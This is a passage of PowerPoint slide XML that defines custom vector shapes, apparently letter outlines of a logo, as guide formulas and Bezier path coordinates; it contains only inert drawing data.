                      <a:pt x="8" y="20"/>
                      <a:pt x="9" y="19"/>
                      <a:pt x="9" y="17"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9" y="7"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9" y="27"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="25"/>
                      <a:pt x="8" y="24"/>
                      <a:pt x="7" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="24"/>
                      <a:pt x="4" y="24"/>
                      <a:pt x="4" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="40"/>
                      <a:pt x="4" y="40"/>
                      <a:pt x="4" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="40"/>
                      <a:pt x="7" y="40"/>
                      <a:pt x="7" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="40"/>
                      <a:pt x="9" y="39"/>
                      <a:pt x="9" y="37"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9"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4"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5446713" y="808038"/>
                <a:ext cx="28575" cy="90488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 14"/>
                  <a:gd name="T1" fmla="*/ 40 h 44"/>
                  <a:gd name="T2" fmla="*/ 12 w 14"/>
                  <a:gd name="T3" fmla="*/ 43 h 44"/>
                  <a:gd name="T4" fmla="*/ 10 w 14"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 0 w 14"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 14"/>
                  <a:gd name="T9" fmla="*/ 1 h 44"/>
                  <a:gd name="T10" fmla="*/ 1 w 14"/>
                  <a:gd name="T11" fmla="*/ 0 h 44"/>
                  <a:gd name="T12" fmla="*/ 13 w 14"/>
                  <a:gd name="T13" fmla="*/ 0 h 44"/>
                  <a:gd name="T14" fmla="*/ 11 w 14"/>
                  <a:gd name="T15" fmla="*/ 3 h 44"/>
                  <a:gd name="T16" fmla="*/ 9 w 14"/>
                  <a:gd name="T17" fmla="*/ 5 h 44"/>
                  <a:gd name="T18" fmla="*/ 5 w 14"/>
                  <a:gd name="T19" fmla="*/ 5 h 44"/>
                  <a:gd name="T20" fmla="*/ 4 w 14"/>
                  <a:gd name="T21" fmla="*/ 6 h 44"/>
                  <a:gd name="T22" fmla="*/ 4 w 14"/>
                  <a:gd name="T23" fmla="*/ 19 h 44"/>
                  <a:gd name="T24" fmla="*/ 11 w 14"/>
                  <a:gd name="T25" fmla="*/ 19 h 44"/>
                  <a:gd name="T26" fmla="*/ 10 w 14"/>
                  <a:gd name="T27" fmla="*/ 22 h 44"/>
                  <a:gd name="T28" fmla="*/ 7 w 14"/>
                  <a:gd name="T29" fmla="*/ 23 h 44"/>
                  <a:gd name="T30" fmla="*/ 5 w 14"/>
                  <a:gd name="T31" fmla="*/ 23 h 44"/>
                  <a:gd name="T32" fmla="*/ 4 w 14"/>
                  <a:gd name="T33" fmla="*/ 24 h 44"/>
                  <a:gd name="T34" fmla="*/ 4 w 14"/>
                  <a:gd name="T35" fmla="*/ 40 h 44"/>
                  <a:gd name="T36" fmla="*/ 14 w 14"/>
                  <a:gd name="T37"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44">
                    <a:moveTo>
                      <a:pt x="14" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="41"/>
                      <a:pt x="12" y="42"/>
                      <a:pt x="12" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="43"/>
                      <a:pt x="11" y="44"/>
                      <a:pt x="10" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1"/>
                      <a:pt x="0" y="1"/>
                      <a:pt x="0" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="1" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="0"/>
                      <a:pt x="13" y="0"/>
                      <a:pt x="13" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="3"/>
                      <a:pt x="11" y="3"/>
                      <a:pt x="11" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="4"/>
                      <a:pt x="10" y="5"/>
                      <a:pt x="9" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="5"/>
                      <a:pt x="5" y="5"/>
                      <a:pt x="5" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="5"/>
                      <a:pt x="4" y="5"/>
                      <a:pt x="4" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="19"/>
                      <a:pt x="4" y="19"/>
                      <a:pt x="4" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="19"/>
                      <a:pt x="11" y="19"/>
                      <a:pt x="11" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="20"/>
                      <a:pt x="10" y="22"/>
                      <a:pt x="10" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="23"/>
                      <a:pt x="9" y="23"/>
                      <a:pt x="7" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="23"/>
                      <a:pt x="5" y="23"/>
                      <a:pt x="5" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="23"/>
                      <a:pt x="4" y="24"/>
                      <a:pt x="4" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="40"/>
                      <a:pt x="4" y="40"/>
                      <a:pt x="4" y="40"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="14"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5502275" y="808038"/>
                <a:ext cx="30163" cy="90488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 15"/>
                  <a:gd name="T1" fmla="*/ 0 h 44"/>
                  <a:gd name="T2" fmla="*/ 15 w 15"/>
                  <a:gd name="T3" fmla="*/ 2 h 44"/>
                  <a:gd name="T4" fmla="*/ 15 w 15"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 11 w 15"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 11 w 15"/>
                  <a:gd name="T9" fmla="*/ 25 h 44"/>
                  <a:gd name="T10" fmla="*/ 10 w 15"/>
                  <a:gd name="T11" fmla="*/ 24 h 44"/>
                  <a:gd name="T12" fmla="*/ 5 w 15"/>
                  <a:gd name="T13" fmla="*/ 24 h 44"/>
                  <a:gd name="T14" fmla="*/ 5 w 15"/>
                  <a:gd name="T15" fmla="*/ 44 h 44"/>
                  <a:gd name="T16" fmla="*/ 0 w 15"/>
                  <a:gd name="T17" fmla="*/ 44 h 44"/>
                  <a:gd name="T18" fmla="*/ 0 w 15"/>
                  <a:gd name="T19" fmla="*/ 2 h 44"/>
                  <a:gd name="T20" fmla="*/ 2 w 15"/>
                  <a:gd name="T21" fmla="*/ 0 h 44"/>
                  <a:gd name="T22" fmla="*/ 5 w 15"/>
                  <a:gd name="T23" fmla="*/ 0 h 44"/>
                  <a:gd name="T24" fmla="*/ 5 w 15"/>
                  <a:gd name="T25" fmla="*/ 18 h 44"/>
                  <a:gd name="T26" fmla="*/ 7 w 15"/>
                  <a:gd name="T27" fmla="*/ 19 h 44"/>
                  <a:gd name="T28" fmla="*/ 11 w 15"/>
                  <a:gd name="T29" fmla="*/ 19 h 44"/>
                  <a:gd name="T30" fmla="*/ 11 w 15"/>
                  <a:gd name="T31" fmla="*/ 0 h 44"/>
                  <a:gd name="T32" fmla="*/ 14 w 15"/>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44">
                    <a:moveTo>
                      <a:pt x="14" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="0"/>
                      <a:pt x="15" y="1"/>
                      <a:pt x="15" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="44"/>
                      <a:pt x="15" y="44"/>
                      <a:pt x="15" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="44"/>
                      <a:pt x="11" y="44"/>
                      <a:pt x="11" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="25"/>
                      <a:pt x="11" y="25"/>
                      <a:pt x="11" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="24"/>
                      <a:pt x="10" y="24"/>
                      <a:pt x="10" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="24"/>
                      <a:pt x="5" y="24"/>
                      <a:pt x="5" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="44"/>
                      <a:pt x="5" y="44"/>
                      <a:pt x="5" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1"/>
                      <a:pt x="1" y="0"/>
                      <a:pt x="2" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="0"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="5" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="18"/>
                      <a:pt x="5" y="18"/>
                      <a:pt x="5" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="19"/>
                      <a:pt x="6" y="19"/>
                      <a:pt x="7" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="19"/>
                      <a:pt x="11" y="19"/>
                      <a:pt x="11" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="0"/>
                      <a:pt x="11" y="0"/>
                      <a:pt x="11" y="0"/>
                    </a:cubicBez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96"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5559425" y="808038"/>
                <a:ext cx="36513" cy="90488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 18"/>
                  <a:gd name="T1" fmla="*/ 44 h 44"/>
                  <a:gd name="T2" fmla="*/ 13 w 18"/>
                  <a:gd name="T3" fmla="*/ 44 h 44"/>
                  <a:gd name="T4" fmla="*/ 9 w 18"/>
                  <a:gd name="T5" fmla="*/ 14 h 44"/>
                  <a:gd name="T6" fmla="*/ 5 w 18"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 18"/>
                  <a:gd name="T9" fmla="*/ 44 h 44"/>
                  <a:gd name="T10" fmla="*/ 7 w 18"/>
                  <a:gd name="T11" fmla="*/ 0 h 44"/>
                  <a:gd name="T12" fmla="*/ 9 w 18"/>
                  <a:gd name="T13" fmla="*/ 0 h 44"/>
                  <a:gd name="T14" fmla="*/ 12 w 18"/>
                  <a:gd name="T15" fmla="*/ 2 h 44"/>
                  <a:gd name="T16" fmla="*/ 18 w 18"/>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44">
                    <a:moveTo>
                      <a:pt x="18" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="44"/>
                      <a:pt x="13" y="44"/>
                      <a:pt x="13" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="14"/>
                      <a:pt x="9" y="14"/>
                      <a:pt x="9" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="44"/>
                      <a:pt x="5" y="44"/>
                      <a:pt x="5" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="7" y="0"/>
                      <a:pt x="7" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="0"/>
                      <a:pt x="9" y="0"/>
                      <a:pt x="9" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="0"/>
                      <a:pt x="11" y="1"/>
                      <a:pt x="12" y="2"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="18"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p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5616575" y="808038"/>
                <a:ext cx="36513" cy="90488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 11 w 18"/>
                  <a:gd name="T1" fmla="*/ 44 h 44"/>
                  <a:gd name="T2" fmla="*/ 9 w 18"/>
                  <a:gd name="T3" fmla="*/ 44 h 44"/>
                  <a:gd name="T4" fmla="*/ 9 w 18"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 6 w 18"/>
                  <a:gd name="T7" fmla="*/ 41 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 18"/>
                  <a:gd name="T9" fmla="*/ 0 h 44"/>
                  <a:gd name="T10" fmla="*/ 4 w 18"/>
                  <a:gd name="T11" fmla="*/ 0 h 44"/>
                  <a:gd name="T12" fmla="*/ 5 w 18"/>
                  <a:gd name="T13" fmla="*/ 2 h 44"/>
                  <a:gd name="T14" fmla="*/ 9 w 18"/>
                  <a:gd name="T15" fmla="*/ 29 h 44"/>
                  <a:gd name="T16" fmla="*/ 14 w 18"/>
                  <a:gd name="T17" fmla="*/ 0 h 44"/>
                  <a:gd name="T18" fmla="*/ 18 w 18"/>
                  <a:gd name="T19" fmla="*/ 0 h 44"/>
                  <a:gd name="T20" fmla="*/ 11 w 18"/>
                  <a:gd name="T21"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44">
                    <a:moveTo>
                      <a:pt x="11" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="44"/>
                      <a:pt x="9" y="44"/>
                      <a:pt x="9" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="44"/>
                      <a:pt x="9" y="44"/>
                      <a:pt x="9" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="44"/>
                      <a:pt x="6" y="41"/>
                      <a:pt x="6" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="4" y="0"/>
                      <a:pt x="4" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="5" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="29"/>
                      <a:pt x="9" y="29"/>
                      <a:pt x="9" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="0"/>
                      <a:pt x="14" y="0"/>
                      <a:pt x="14" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="0"/>
                      <a:pt x="18" y="0"/>
                      <a:pt x="18" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="11"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8"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5684838" y="808038"/>
                <a:ext cx="9525" cy="90488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 5"/>
                  <a:gd name="T1" fmla="*/ 0 h 44"/>
                  <a:gd name="T2" fmla="*/ 5 w 5"/>
                  <a:gd name="T3" fmla="*/ 2 h 44"/>
                  <a:gd name="T4" fmla="*/ 5 w 5"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 2 w 5"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 5"/>
                  <a:gd name="T9" fmla="*/ 43 h 44"/>
                  <a:gd name="T10" fmla="*/ 0 w 5"/>
                  <a:gd name="T11" fmla="*/ 0 h 44"/>
                  <a:gd name="T12" fmla="*/ 3 w 5"/>
                  <a:gd name="T13" fmla="*/ 0 h 44"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T10" y="T11"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T12" y="T13"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="5" h="44">
                    <a:moveTo>
                      <a:pt x="3" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="0"/>
                      <a:pt x="5" y="1"/>
                      <a:pt x="5" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="44"/>
                      <a:pt x="5" y="44"/>
                      <a:pt x="5" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="44"/>
                      <a:pt x="2" y="44"/>
                      <a:pt x="2" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="44"/>
                      <a:pt x="0" y="43"/>
                      <a:pt x="0" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>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99"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5729288" y="808038"/>
                <a:ext cx="30163" cy="90488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 9 w 15"/>
                  <a:gd name="T1" fmla="*/ 0 h 44"/>
                  <a:gd name="T2" fmla="*/ 15 w 15"/>
                  <a:gd name="T3" fmla="*/ 5 h 44"/>
                  <a:gd name="T4" fmla="*/ 15 w 15"/>
                  <a:gd name="T5" fmla="*/ 39 h 44"/>
                  <a:gd name="T6" fmla="*/ 9 w 15"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 6 w 15"/>
                  <a:gd name="T9" fmla="*/ 44 h 44"/>
                  <a:gd name="T10" fmla="*/ 0 w 15"/>
                  <a:gd name="T11" fmla="*/ 39 h 44"/>
                  <a:gd name="T12" fmla="*/ 0 w 15"/>
                  <a:gd name="T13" fmla="*/ 5 h 44"/>
                  <a:gd name="T14" fmla="*/ 6 w 15"/>
                  <a:gd name="T15" fmla="*/ 0 h 44"/>
                  <a:gd name="T16" fmla="*/ 9 w 15"/>
                  <a:gd name="T17" fmla="*/ 0 h 44"/>
                  <a:gd name="T18" fmla="*/ 8 w 15"/>
                  <a:gd name="T19" fmla="*/ 40 h 44"/>
                  <a:gd name="T20" fmla="*/ 10 w 15"/>
                  <a:gd name="T21" fmla="*/ 38 h 44"/>
                  <a:gd name="T22" fmla="*/ 10 w 15"/>
                  <a:gd name="T23" fmla="*/ 6 h 44"/>
                  <a:gd name="T24" fmla="*/ 8 w 15"/>
                  <a:gd name="T25" fmla="*/ 4 h 44"/>
                  <a:gd name="T26" fmla="*/ 7 w 15"/>
                  <a:gd name="T27" fmla="*/ 4 h 44"/>
                  <a:gd name="T28" fmla="*/ 5 w 15"/>
                  <a:gd name="T29" fmla="*/ 6 h 44"/>
                  <a:gd name="T30" fmla="*/ 5 w 15"/>
                  <a:gd name="T31" fmla="*/ 38 h 44"/>
                  <a:gd name="T32" fmla="*/ 7 w 15"/>
                  <a:gd name="T33" fmla="*/ 40 h 44"/>
                  <a:gd name="T34" fmla="*/ 8 w 15"/>
                  <a:gd name="T35"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44">
                    <a:moveTo>
                      <a:pt x="9" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="0"/>
                      <a:pt x="15" y="2"/>
                      <a:pt x="15" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="39"/>
                      <a:pt x="15" y="39"/>
                      <a:pt x="15" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="42"/>
                      <a:pt x="12" y="44"/>
                      <a:pt x="9" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="44"/>
                      <a:pt x="6" y="44"/>
                      <a:pt x="6" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="44"/>
                      <a:pt x="0" y="42"/>
                      <a:pt x="0" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="5"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="0" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="3" y="0"/>
                      <a:pt x="6" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="8" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="40"/>
                      <a:pt x="10" y="39"/>
                      <a:pt x="10" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="6"/>
                      <a:pt x="10" y="6"/>
                      <a:pt x="10" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="5"/>
                      <a:pt x="9" y="4"/>
                      <a:pt x="8" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="4"/>
                      <a:pt x="7" y="4"/>
                      <a:pt x="7" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="4"/>
                      <a:pt x="5" y="5"/>
                      <a:pt x="5" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="38"/>
                      <a:pt x="5" y="38"/>
                      <a:pt x="5" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="39"/>
                      <a:pt x="6" y="40"/>
                      <a:pt x="7"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00"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5792788" y="808038"/>
                <a:ext cx="28575" cy="90488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 9 w 14"/>
                  <a:gd name="T1" fmla="*/ 44 h 44"/>
                  <a:gd name="T2" fmla="*/ 9 w 14"/>
                  <a:gd name="T3" fmla="*/ 28 h 44"/>
                  <a:gd name="T4" fmla="*/ 7 w 14"/>
                  <a:gd name="T5" fmla="*/ 25 h 44"/>
                  <a:gd name="T6" fmla="*/ 4 w 14"/>
                  <a:gd name="T7" fmla="*/ 25 h 44"/>
                  <a:gd name="T8" fmla="*/ 4 w 14"/>
                  <a:gd name="T9" fmla="*/ 44 h 44"/>
                  <a:gd name="T10" fmla="*/ 0 w 14"/>
                  <a:gd name="T11" fmla="*/ 44 h 44"/>
                  <a:gd name="T12" fmla="*/ 0 w 14"/>
                  <a:gd name="T13" fmla="*/ 0 h 44"/>
                  <a:gd name="T14" fmla="*/ 8 w 14"/>
                  <a:gd name="T15" fmla="*/ 0 h 44"/>
                  <a:gd name="T16" fmla="*/ 13 w 14"/>
                  <a:gd name="T17" fmla="*/ 6 h 44"/>
                  <a:gd name="T18" fmla="*/ 13 w 14"/>
                  <a:gd name="T19" fmla="*/ 19 h 44"/>
                  <a:gd name="T20" fmla="*/ 12 w 14"/>
                  <a:gd name="T21" fmla="*/ 23 h 44"/>
                  <a:gd name="T22" fmla="*/ 13 w 14"/>
                  <a:gd name="T23" fmla="*/ 27 h 44"/>
                  <a:gd name="T24" fmla="*/ 13 w 14"/>
                  <a:gd name="T25" fmla="*/ 44 h 44"/>
                  <a:gd name="T26" fmla="*/ 9 w 14"/>
                  <a:gd name="T27" fmla="*/ 44 h 44"/>
                  <a:gd name="T28" fmla="*/ 7 w 14"/>
                  <a:gd name="T29" fmla="*/ 21 h 44"/>
                  <a:gd name="T30" fmla="*/ 9 w 14"/>
                  <a:gd name="T31" fmla="*/ 18 h 44"/>
                  <a:gd name="T32" fmla="*/ 9 w 14"/>
                  <a:gd name="T33" fmla="*/ 7 h 44"/>
                  <a:gd name="T34" fmla="*/ 7 w 14"/>
                  <a:gd name="T35" fmla="*/ 4 h 44"/>
                  <a:gd name="T36" fmla="*/ 4 w 14"/>
                  <a:gd name="T37" fmla="*/ 4 h 44"/>
                  <a:gd name="T38" fmla="*/ 4 w 14"/>
                  <a:gd name="T39" fmla="*/ 21 h 44"/>
                  <a:gd name="T40" fmla="*/ 7 w 14"/>
                  <a:gd name="T41" fmla="*/ 2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 h="44">
                    <a:moveTo>
                      <a:pt x="9" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="28"/>
                      <a:pt x="9" y="28"/>
                      <a:pt x="9" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="26"/>
                      <a:pt x="8" y="25"/>
                      <a:pt x="7" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="25"/>
                      <a:pt x="4" y="25"/>
                      <a:pt x="4" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="44"/>
                      <a:pt x="4" y="44"/>
                      <a:pt x="4" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                      <a:pt x="0" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="0"/>
                      <a:pt x="8" y="0"/>
                      <a:pt x="8" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="0"/>
                      <a:pt x="13" y="3"/>
                      <a:pt x="13" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="19"/>
                      <a:pt x="13" y="19"/>
                      <a:pt x="13" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="19"/>
                      <a:pt x="14" y="23"/>
                      <a:pt x="12" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="24"/>
                      <a:pt x="13" y="27"/>
                      <a:pt x="13" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="44"/>
                      <a:pt x="13" y="44"/>
                      <a:pt x="13" y="44"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9" y="44"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="7" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="21"/>
                      <a:pt x="9" y="20"/>
                      <a:pt x="9" y="18"/>
                    </a:cubicBezTo>
